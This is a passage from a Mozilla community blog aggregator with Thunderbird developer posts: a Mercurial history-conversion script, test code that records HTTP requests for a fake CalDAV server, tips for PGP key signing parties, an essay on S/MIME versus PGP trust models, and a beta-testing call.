CC_CVS_BASE=$(hg log -R $HGCVS -r 'tip' --template '{node}') CC_CVS_BASE=$(grep $CC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2) MC_CVS_BASE=$(hg log -R $HGCVS -r 'gitnode(215f52d06f4260fdcca797eebd78266524ea3d2c)' --template '{node}') MC_CVS_BASE=$(grep $MC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2) # Okay, now we need to build the map of revisions. cat >$WORKDIR/convert-revmap.txt <<EOF e4f4569d451a5e0d12a6aa33ebd916f979dd8faa $CC_CVS_BASE # Thunderbird / Suite 7c0bfdcda6731e77303f3c47b01736aaa93d5534 d4b728dc9da418f8d5601ed6735e9a00ac963c4e, $CC_CVS_BASE # Calendar 9b2a99adc05e53cd4010de512f50118594756650 $MC_CVS_BASE # Mozilla graft point ee719a0502491fc663bda942dcfc52c0825938d3 78b3d6c649f71eff41fe3f486c6cc4f4b899fd35, $MC_EDITOR_IMPORT # Editor 8cdfed92867f885fda98664395236b7829947a1d 4b5da7e5d0680c6617ec743109e6efc88ca413da, e4e612fcae9d0e5181a5543ed17f705a83a3de71 # Chat EOF # Next, import mozilla-central revisions for rev in $MC_MORK_IMPORT $MC_EDITOR_IMPORT $MC_SMIME_IMPORT; do hg convert $MC $OUTPUT -r $rev --splicemap $WORKDIR/convert-revmap.txt \ --filemap $WORKDIR/convert-filemap.txt done

Some notes about all of the revision ids in the script. The splicemap requires the full 40-character SHA ids; anything less and the thing complains. I also need to specify the parents of the revisions that deleted the code for the mozilla-central import, so if you go hunting for those revisions and are surprised that they don't remove the code in question, that's why.

I mentioned complications about the merges earlier. The Mork and S/MIME import codes here moved files, so that what was db/mdb in mozilla-central became db/mork. There's no support for causing the generated splice to record these as a move, so I have to manually construct those renamings:

# We need to execute a few hg move commands due to renamings. pushd $OUTPUT hg update -r $(grep $MC_MORK_IMPORT .hg/shamap | cut -d' ' -f2) (hg -R $MC log -r "children($MC_MORK_IMPORT)" \ --template "{file_dels % 'hg mv {file} {sub(\"db/mdb\", \"db/mork\", file)}\n'}") | bash hg commit -m 'Pseudo-changeset to move Mork files' -d '2011-08-06 17:25:21 +0200' MC_MORK_IMPORT=$(hg log -r tip --template '{node}') hg update -r $(grep $MC_SMIME_IMPORT .hg/shamap | cut -d' ' -f2) (hg -R $MC log -r "children($MC_SMIME_IMPORT)" \ --template "{file_dels % 'hg mv {file} {sub(\"security/manager/ssl\", \"mailnews/mime\", file)}\n'}") | bash hg commit -m 'Pseudo-changeset to move S/MIME files' -d '2014-06-15 20:51:51 -0700' MC_SMIME_IMPORT=$(hg log -r tip --template '{node}') popd # Echo the new move commands to the changeset conversion map. cat >>$WORKDIR/convert-revmap.txt <<EOF 52efa9789800829c6f0ee6a005f83ed45a250396 abfd23d7c5042bc87502506c9f34c965fb9a09d1, $MC_MORK_IMPORT # Mork 50f5b5fc3f53c680dba4f237856e530e2097adfd 97253b3cca68f1c287eb5729647ba6f9a5dab08a, $MC_SMIME_IMPORT # S/MIME EOF

Now that we have all of the graft points defined, and all of the external code ready, we can pull comm-central and do the conversion. That's not quite it, though—when we graft the S/MIME history to the original mozilla-central history, we have a small segment of abandoned converted history. A call to hg strip removes that.

# Now, import comm-central revisions that we need hg convert $CC $OUTPUT --splicemap $WORKDIR/convert-revmap.txt hg strip 2f69e0a3a05a

[1] I left out one of the graft points because I just didn't want to deal with it. I'll leave it as an exercise to the reader to figure out which one it was. Hint: it's the only one I didn't know about before I searched for the archive points [2].
[2] Since I wasn't sure I knew all of the graft points, I decided to try to comb through all of the changesets to figure out who imported code. It turns out that hg log -r 'adds("**")' narrows it down nicely (1667 changesets to look at instead of 17547), and using the {file_adds} template helps winnow it down more easily.

Categorieën: Mozilla-nl planet

Philipp Kewisch: Monitor all http(s) network requests using the Mozilla Platform

Thunderbird - do, 02/10/2014 - 16:38

In an xpcshell test, I recently needed a way to monitor all network requests and access both request and response data so I can save them for later use. This required a little bit of digging in Mozilla’s devtools code so I thought I’d write a short blog post about it.

This code will be used in a testcase that ensures that calendar providers in Lightning function properly. In the case of the CalDAV provider, we would need to access a real server for testing. We can’t just set up a few servers and use them for testing, it would end in an unreasonable amount of server maintenance. Given non-local connections are not allowed when running the tests on the Mozilla build infrastructure, it wouldn’t work anyway. The solution is to create a fakeserver, that is able to replay the requests in the same way. Instead of manually making the requests and figuring out how the server replies, we can use this code to quickly collect all the requests we need.

Without further delay, here is the code you have been waiting for:

/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ var allRequests = []; /** * Add the following function as a request observer: * Services.obs.addObserver(httpObserver, "http-on-examine-response", false); * * When done listening on requests: * dump(allRequests.join("\n===\n")); // print them * dump(JSON.stringify(allRequests, null, " ")) // jsonify them */ function httpObserver(aSubject, aTopic, aData) { if (aSubject instanceof Components.interfaces.nsITraceableChannel) { let request = new TracedRequest(aSubject); request._next = aSubject.setNewListener(request); allRequests.push(request); } } /** * This is the object that represents a request/response and also collects the data for it * * @param aSubject The channel from the response observer. */ function TracedRequest(aSubject) { let httpchannel = aSubject.QueryInterface(Components.interfaces.nsIHttpChannel); let self = this; this.requestHeaders = Object.create(null); httpchannel.visitRequestHeaders({ visitHeader: function(k, v) { self.requestHeaders[k] = v; } }); this.responseHeaders = Object.create(null); httpchannel.visitResponseHeaders({ visitHeader: function(k, v) { self.responseHeaders[k] = v; } }); this.uri = aSubject.URI.spec; this.method = httpchannel.requestMethod; this.requestBody = readRequestBody(aSubject); this.responseStatus = httpchannel.responseStatus; this.responseStatusText = httpchannel.responseStatusText; this._chunks = []; } TracedRequest.prototype = { uri: null, method: null, requestBody: null, requestHeaders: null, responseStatus: null, responseStatusText: null, responseHeaders: null, responseBody: null, toJSON: function() { let j = Object.create(null); for (let m of Object.keys(this)) { if (typeof this[m] != "function" && m[0] != "_") { j[m] = this[m]; } } return j; }, onStartRequest: function(aRequest, aContext) this._next.onStartRequest(aRequest, aContext), onStopRequest: function(aRequest, aContext, aStatusCode) { this.responseBody = this._chunks.join(""); this._chunks = null; this._next.onStopRequest(aRequest, aContext, aStatusCode); this._next = null; }, onDataAvailable: function(aRequest, aContext, aStream, aOffset, aCount) { let binaryInputStream = Components.classes["@mozilla.org/binaryinputstream;1"] .createInstance(Components.interfaces.nsIBinaryInputStream); let storageStream = Components.classes["@mozilla.org/storagestream;1"] .createInstance(Components.interfaces.nsIStorageStream); let outStream = Components.classes["@mozilla.org/binaryoutputstream;1"] .createInstance(Components.interfaces.nsIBinaryOutputStream); binaryInputStream.setInputStream(aStream); storageStream.init(8192, aCount, null); outStream.setOutputStream(storageStream.getOutputStream(0)); let data = binaryInputStream.readBytes(aCount); this._chunks.push(data); outStream.writeBytes(data, aCount); this._next.onDataAvailable(aRequest, aContext, storageStream.newInputStream(0), aOffset, aCount); }, toString: function() { let str = this.method + " " + this.uri; for (let hdr of Object.keys(this.requestHeaders)) { str += hdr + ": " + this.requestHeaders[hdr] + "\n"; } if (this.requestBody) { str += "\r\n" + this.requestBody + "\n"; } str += "\n" + this.responseStatus + " " + this.responseStatusText if (this.responseBody) { str += "\r\n" + this.responseBody + "\n"; } return str; } }; // Taken from: // http://hg.mozilla.org/mozilla-central/file/2399d1ae89e9/toolkit/devtools/webconsole/network-helper.js#l120 function readRequestBody(aRequest, aCharset="UTF-8") { let text = null; if (aRequest instanceof Ci.nsIUploadChannel) { let iStream = aRequest.uploadStream; let isSeekableStream = false; if (iStream instanceof Ci.nsISeekableStream) { isSeekableStream = true; } let prevOffset; if (isSeekableStream) { prevOffset = iStream.tell(); iStream.seek(Ci.nsISeekableStream.NS_SEEK_SET, 0); } // Read data from the stream. try { let rawtext = NetUtil.readInputStreamToString(iStream, iStream.available()) let conv = Components.classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); conv.charset = aCharset; text = conv.ConvertToUnicode(rawtext); } catch (err) { } // Seek locks the file, so seek to the beginning only if necko hasn't // read it yet, since necko doesn't eek to 0 before reading (at lest // not till 459384 is fixed). if (isSeekableStream && prevOffset == 0) { iStream.seek(Components.interfaces.nsISeekableStream.NS_SEEK_SET, 0); } } return text; }

view raw
TracedRequest.js
hosted with ❤ by GitHub

Categorieën: Mozilla-nl planet

Ludovic Hirlimann: Tips on organizing a pgp key signing party

Thunderbird - ma, 29/09/2014 - 13:03

Over the years I’ve organized or tried to organize pgp key signing parties every time I go somewhere. I the last year I’ve organized 3 that were successful (eg with more then 10 attendees).

1. Have a venue

I’ve tried a bunch of times to have people show up at the hotel I was staying in the morning - that doesn’t work. Having catering at the venues is even better, it will encourage people to come from far away (or long distance commute). Try to show the path in the venues with signs (paper with PGP key signing party and arrows help).

2. Date and time

Meeting in the evening after work works better ( after 18 or 18:30 works better).

Let people know how long it will take (count 1 hour/per 30 participants).

3. Make people sign up

That makes people think twice before saying they will attend. It’s also an easy way for you to know how much beer/cola/ etc.. you’ll need to provide if you cater food.

I’ve been using eventbrite to manage attendance at my last three meeting it let’s me :

  • know who is coming
  • Mass mail participants
  • have them have a calendar reminder
4 Reach out

For such a party you need people to attend so you need to reach out.

I always start by a search on biglumber.com to find who are the people using gpg registered on that site for the area I’m visiting (see below on what I send).

Then I look for local linux users groups / *BSD groups  and send an announcement to them with :

  • date
  • venue
  • link to eventbrite and why I use it
  • ask them to forward (they know the area better than you)
  • I also use lanyrd and twitter but I’m not convinced that it works.

for my last announcement it looked like this :

Subject: GnuPG / PGP key signing party September 26 2014 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="t01Mpe56TgLc7mgHKVMajjwkqQdw8XvI4" This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --t01Mpe56TgLc7mgHKVMajjwkqQdw8XvI4 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Hello my name is ludovic, I'm a sysadmins at mozilla working remote from europe. I've been involved with Thunderbird a lot (and still am). I'm organizing a pgp Key signing party in the Mozilla san francisco office on September the 26th 2014 from 6PM to 8PM. For security and assurances reasons I need to count how many people will attend. I'v setup a eventbrite for that at https://www.eventbrite.com/e/gnupg-pgp-key-signing-party-making-the-web-o= f-trust-stronger-tickets-12867542165 (please take one ticket if you think about attending - If you change you mind cancel so more people can come). I will use the eventbrite tool to send reminders and I will try to make a list with keys and fingerprint before the event to make things more manageable (but I don't promise). for those using lanyrd you will be able to use http://lanyrd.com/ccckzw. Ludovic ps sent to buug.org,nblug.org end penlug.org - please feel free to post where appropriate ( the more the meerier, the stronger the web of trust).= ps2 I have contacted people listed on biglumber to have more gpg related people show up. --=20 [:Usul] MOC Team at Mozilla QA Lead fof Thunderbird http://sietch-tabr.tumblr.com/ - http://weusepgp.info/ 5. Make it easy to attend

As noted above making a list of participants to hand out helps a lot (I’ve used http://www.phildev.net/pius/ and my own stuff to make a list). It make it easier for you, for attendees. Tell people what they need to bring (IDs, pen, printed fingerprints if you don’t provide a list).

6. Send reminders

Send people reminder and let them know how many people intend to show up. It boosts audience.

Categorieën: Mozilla-nl planet

Ludovic Hirlimann: Gnupg / PGP key signing party in mozilla's San francisco space

Thunderbird - wo, 17/09/2014 - 02:35

I’m organizing a pgp Keysigning party in the Mozilla san francisco office on September the 26th 2014 from 6PM to 8PM.

For security and assurances reasons I need to count how many people will attend. I’ve setup a eventbrite for that at https://www.eventbrite.com/e/gnupg-pgp-key-signing-party-making-the-web-of-trust-stronger-tickets-12867542165 (please take one ticket if you think about attending - If you change you mind cancel so more people can come).

I will use the eventbrite tool to send reminders and I will try to make a list with keys and fingerprint before the event to make things more manageable (but I don’t promise).

For those using lanyrd you will be able to use http://lanyrd.com/ccckzw.(Please tweet the event to get more people in).

Categorieën: Mozilla-nl planet

Joshua Cranmer: Why email is hard, part 7: email security and trust

Thunderbird - wo, 06/08/2014 - 05:39
This post is part 7 of an intermittent series exploring the difficulties of writing an email client. Part 1 describes a brief history of the infrastructure. Part 2 discusses internationalization. Part 3 discusses MIME. Part 4 discusses email addresses. Part 5 discusses the more general problem of email headers. Part 6 discusses how email security works in practice. This part discusses the problem of trust.

At a technical level, S/MIME and PGP (or at least PGP/MIME) use cryptography essentially identically. Yet the two are treated as radically different models of email security because they diverge on the most important question of public key cryptography: how do you trust the identity of a public key? Trust is critical, as it is the only way to stop an active, man-in-the-middle (MITM) attack. MITM attacks are actually easier to pull off in email, since all email messages effectively have to pass through both the sender's and the recipients' email servers [1], allowing attackers to be able to pull off permanent, long-lasting MITM attacks [2].

S/MIME uses the same trust model that SSL uses, based on X.509 certificates and certificate authorities. X.509 certificates effectively work by providing a certificate that says who you are which is signed by another authority. In the original concept (as you might guess from the name "X.509"), the trusted authority was your telecom provider, and the certificates were furthermore intended to be a part of the global X.500 directory—a natural extension of the OSI internet model. The OSI model of the internet never gained traction, and the trusted telecom providers were replaced with trusted root CAs.

PGP, by contrast, uses a trust model that's generally known as the Web of Trust. Every user has a PGP key (containing their identity and their public key), and users can sign others' public keys. Trust generally flows from these signatures: if you trust a user, you know the keys that they sign are correct. The name "Web of Trust" comes from the vision that trust flows along the paths of signatures, building a tight web of trust.

And now for the controversial part of the post, the comparisons and critiques of these trust models. A disclaimer: I am not a security expert, although I am a programmer who revels in dreaming up arcane edge cases. I also don't use PGP at all, and use S/MIME to a very limited extent for some Mozilla work [3], although I did try a few abortive attempts to dogfood it in the past. I've attempted to replace personal experience with comprehensive research [4], but most existing critiques and comparisons of these two trust models are about 10-15 years old and predate several changes to CA certificate practices.

A basic tenet of development that I have found is that the average user is fairly ignorant. At the same time, a lot of the defense of trust models, both CAs and Web of Trust, tends to hinge on configurability. How many people, for example, know how to add or remove a CA root from Firefox, Windows, or Android? Even among the subgroup of Mozilla developers, I suspect the number of people who know how to do so are rather few. Or in the case of PGP, how many people know how to change the maximum path length? Or even understand the security implications of doing so?

Seen in the light of ignorant users, the Web of Trust is a UX disaster. Its entire security model is predicated on having users precisely specify how much they trust other people to trust others (ultimate, full, marginal, none, unknown) and also on having them continually do out-of-band verification procedures and publicly reporting those steps. In 1998, a seminal paper on the usability of a GUI for PGP encryption came to the conclusion that the UI was effectively unusable for users, to the point that only a third of the users were able to send an encrypted email (and even then, only with significant help from the test administrators), and a quarter managed to publicly announce their private keys at some point, which is pretty much the worst thing you can do. They also noted that the complex trust UI was never used by participants, although the failure of many users to get that far makes generalization dangerous [5]. While newer versions of security UI have undoubtedly fixed many of the original issues found (in no small part due to the paper, one of the first to argue that usability is integral, not orthogonal, to security), I have yet to find an actual study on the usability of the trust model itself.

The Web of Trust has other faults. The notion of "marginal" trust it turns out is rather broken: if you marginally trust a user who has two keys who both signed another person's key, that's the same as fully trusting a user with one key who signed that key. There are several proposals for different trust formulas [6], but none of them have caught on in practice to my knowledge.

A hidden fault is associated with its manner of presentation: in sharp contrast to CAs, the Web of Trust appears to not delegate trust, but any practical widespread deployment needs to solve the problem of contacting people who have had no prior contact. Combined with the need to bootstrap new users, this implies that there needs to be some keys that have signed a lot of other keys that are essentially default-trusted—in other words, a CA, a fact sometimes lost on advocates of the Web of Trust.

That said, a valid point in favor of the Web of Trust is that it more easily allows people to distrust CAs if they wish to. While I'm skeptical of its utility to a broader audience, the ability to do so for is crucial for a not-insignificant portion of the population, and it's important enough to be explicitly called out.

X.509 certificates are most commonly discussed in the context of SSL/TLS connections, so I'll discuss them in that context as well, as the implications for S/MIME are mostly the same. Almost all criticism of this trust model essentially boils down to a single complaint: certificate authorities aren't trustworthy. A historical criticism is that the addition of CAs to the main root trust stores was ad-hoc. Since then, however, the main oligopoly of these root stores (Microsoft, Apple, Google, and Mozilla) have made their policies public and clear [7]. The introduction of the CA/Browser Forum in 2005, with a collection of major CAs and the major browsers as members, and several [8] helps in articulating common policies. These policies, simplified immensely, boil down to:

  1. You must verify information (depending on certificate type). This information must be relatively recent.
  2. You must not use weak algorithms in your certificates (e.g., no MD5).
  3. You must not make certificates that are valid for too long.
  4. You must maintain revocation checking services.
  5. You must have fairly stringent physical and digital security practices and intrusion detection mechanisms.
  6. You must be [externally] audited every year that you follow the above rules.
  7. If you screw up, we can kick you out.

I'm not going to claim that this is necessarily the best policy or even that any policy can feasibly stop intrusions from happening. But it's a policy, so CAs must abide by some set of rules.

Another CA criticism is the fear that they may be suborned by national government spy agencies. I find this claim underwhelming, considering that the number of certificates acquired by intrusions that were used in the wild is larger than the number of certificates acquired by national governments that were used in the wild: 1 and 0, respectively. Yet no one complains about the untrustworthiness of CAs due to their ability to be hacked by outsiders. Another attack is that CAs are controlled by profit-seeking corporations, which misses the point because the business of CAs is not selling certificates but selling their access to the root databases. As we will see shortly, jeopardizing that access is a great way for a CA to go out of business.

To understand issues involving CAs in greater detail, there are two CAs that are particularly useful to look at. The first is CACert. CACert is favored by many by its attempt to handle X.509 certificates in a Web of Trust model, so invariably every public discussion about CACert ends up devolving into an attack on other CAs for their perceived capture by national governments or corporate interests. Yet what many of the proponents for inclusion of CACert miss (or dismiss) is the fact that CACert actually failed the required audit, and it is unlikely to ever pass an audit. This shows a central failure of both CAs and Web of Trust: different people have different definitions of "trust," and in the case of CACert, some people are favoring a subjective definition (I trust their owners because they're not evil) when an objective definition fails (in this case, that the root signing key is securely kept).

The other CA of note here is DigiNotar. In July 2011, some hackers managed to acquire a few fraudulent certificates by hacking into DigiNotar's systems. By late August, people had become aware of these certificates being used in practice [9] to intercept communications, mostly in Iran. The use appears to have been caught after Chromium updates failed due to invalid certificate fingerprints. After it became clear that the fraudulent certificates were not limited to a single fake Google certificate, and that DigiNotar had failed to notify potentially affected companies of its breach, DigiNotar was swiftly removed from all of the trust databases. It ended up declaring bankruptcy within two weeks.

DigiNotar indicates several things. One, SSL MITM attacks are not theoretical (I have seen at least two or three security experts advising pre-DigiNotar that SSL MITM attacks are "theoretical" and therefore the wrong target for security mechanisms). Two, keeping the trust of browsers is necessary for commercial operation of CAs. Three, the notion that a CA is "too big to fail" is false: DigiNotar played an important role in the Dutch community as a major CA and the operator of Staat der Nederlanden. Yet when DigiNotar screwed up and lost its trust, it was swiftly kicked out despite this role. I suspect that even Verisign could be kicked out if it manages to screw up badly enough.

This isn't to say that the CA model isn't problematic. But the source of its problems is that delegating trust isn't a feasible model in the first place, a problem that it shares with the Web of Trust as well. Different notions of what "trust" actually means and the uncertainty that gets introduced as chains of trust get longer both make delegating trust weak to both social engineering and technical engineering attacks. There appears to be an increasing consensus that the best way forward is some variant of key pinning, much akin to how SSH works: once you know someone's public key, you complain if that public key appears to change, even if it appears to be "trusted." This does leave people open to attacks on first use, and the question of what to do when you need to legitimately re-key is not easy to solve.

In short, both CAs and the Web of Trust have issues. Whether or not you should prefer S/MIME or PGP ultimately comes down to the very conscious question of how you want to deal with trust—a question without a clear, obvious answer. If I appear to be painting CAs and S/MIME in a positive light and the Web of Trust and PGP in a negative one in this post, it is more because I am trying to focus on the positions less commonly taken to balance perspective on the internet. In my next post, I'll round out the discussion on email security by explaining why email security has seen poor uptake and answering the question as to which email security protocol is most popular. The answer may surprise you!

[1] Strictly speaking, you can bypass the sender's SMTP server. In practice, this is considered a hole in the SMTP system that email providers are trying to plug.
[2] I've had 13 different connections to the internet in the same time as I've had my main email address, not counting all the public wifis that I have used. Whereas an attacker would find it extraordinarily difficult to intercept all of my SSH sessions for a MITM attack, intercepting all of my email sessions is clearly far easier if the attacker were my email provider.
[3] Before you read too much into this personal choice of S/MIME over PGP, it's entirely motivated by a simple concern: S/MIME is built into Thunderbird; PGP is not. As someone who does a lot of Thunderbird development work that could easily break the Enigmail extension locally, needing to use an extension would be disruptive to workflow.
[4] This is not to say that I don't heavily research many of my other posts, but I did go so far for this one as to actually start going through a lot of published journals in an attempt to find information.
[5] It's questionable how well the usability of a trust model UI can be measured in a lab setting, since the observer effect is particularly strong for all metrics of trust.
[6] The web of trust makes a nice graph, and graphs invite lots of interesting mathematical metrics. I've always been partial to eigenvectors of the graph, myself.
[7] Mozilla's policy for addition to NSS is basically the standard policy adopted by all open-source Linux or BSD distributions, seeing as OpenSSL never attempted to produce a root database.
[8] It looks to me that it's the browsers who are more in charge in this forum than the CAs.
[9] To my knowledge, this is the first—and so far only—attempt to actively MITM an SSL connection.

Categorieën: Mozilla-nl planet

Ludovic Hirlimann: Thunderbird 31 coming soon to you and needs testing love

Thunderbird - vr, 11/07/2014 - 12:39

We just released the second beta of Thunderbird 31. Please help us improve Thunderbird quality by uncovering bugs now in Thunderbird 31 beta so that developers have time to fix them.

There are two ways you can help

- Use Thunderbird 31 beta in your daily activities. For problems that you find, file a bug report that blocks our tracking bug 1008543.

- Use Thunderbird 31 beta to do formal testing.  Use the moztrap testing system to tests : choose run test - find the Thunderbird product and choose 31 test run.

Visit https://etherpad.mozilla.org/tbird31testing for additional information, and to post your testing questions and results.

Thanks for contributing and helping!

Ludo for the QA team

Updated links

Categorieën: Mozilla-nl planet

Pagina's